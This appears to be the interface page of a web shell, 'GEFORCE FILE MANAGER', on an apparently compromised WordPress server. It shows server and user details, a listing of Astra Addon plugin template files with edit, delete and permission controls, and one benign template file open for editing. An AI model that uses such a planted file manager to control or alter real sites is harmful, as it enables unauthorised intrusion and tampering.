[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
astra-addon
/
addons
/
blog-pro
/
template
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 author-info.php
2,633 B
SET
[ EDIT ]
|
[ DEL ]
📄 blog-layout-2.php
1,473 B
SET
[ EDIT ]
|
[ DEL ]
📄 blog-layout-3.php
1,483 B
SET
[ EDIT ]
|
[ DEL ]
📄 content-partial.php
756 B
SET
[ EDIT ]
|
[ DEL ]
📄 index.php
111 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: content-partial.php
<?php /** * Blog Pro partial content template. * * @link https://www.brainstormforce.com * @since 1.0.0 * @package Astra Addon */ if ( have_posts() ) { // Load content before the loop. do_action( 'astra_before_content_partial_loop' ); while ( have_posts() ) { the_post(); get_template_part( 'template-parts/content', 'single' ); // If comments are open or we have at least one comment, load up the comment template. if ( comments_open() || get_comments_number() ) { comments_template(); } } // Load content after the loop. do_action( 'astra_after_content_partial_loop' ); } else { // Load content if there are no more posts. do_action( 'astra_no_more_posts_content_partial' ); } // END if have_posts().